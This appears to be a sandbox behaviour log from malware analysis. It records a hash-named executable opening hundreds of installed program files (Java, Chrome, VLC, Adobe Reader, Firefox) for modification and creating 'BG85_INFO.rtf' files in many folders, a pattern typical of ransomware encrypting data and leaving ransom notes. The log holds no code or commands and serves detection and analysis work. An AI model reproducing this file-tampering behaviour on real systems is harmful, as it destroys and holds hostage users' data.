c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\icudtl.dat c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Stockholm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guadalcanal c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.logging_1.1.1.v201101211721.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Efate c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kuching c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javaws.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fiji c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guayaquil c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santiago c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST5EDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\update-settings.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guyana c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\com-sun-tools-visualvm-modules-startup.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Martinique c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Madrid c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.jdp_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-search.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.bfc c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\elevation_service.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Midway c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Simferopol c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bishkek c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\nl.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\ZoneInfoMappings c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.servlet_1.1.500.v20140318-1755.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\St_Johns c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\README.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\classlist c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\cacerts c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kwajalein c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\fonts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Andorra c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\ConvertFromSearch.vb c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ktab.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Asuncion c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Monaco c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boise c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\abcpy.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Monaco c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Warsaw c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Fortaleza c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\rt.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Khandyga c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\vi.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\about.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Nicosia c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jakarta c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_zh_CN.jar 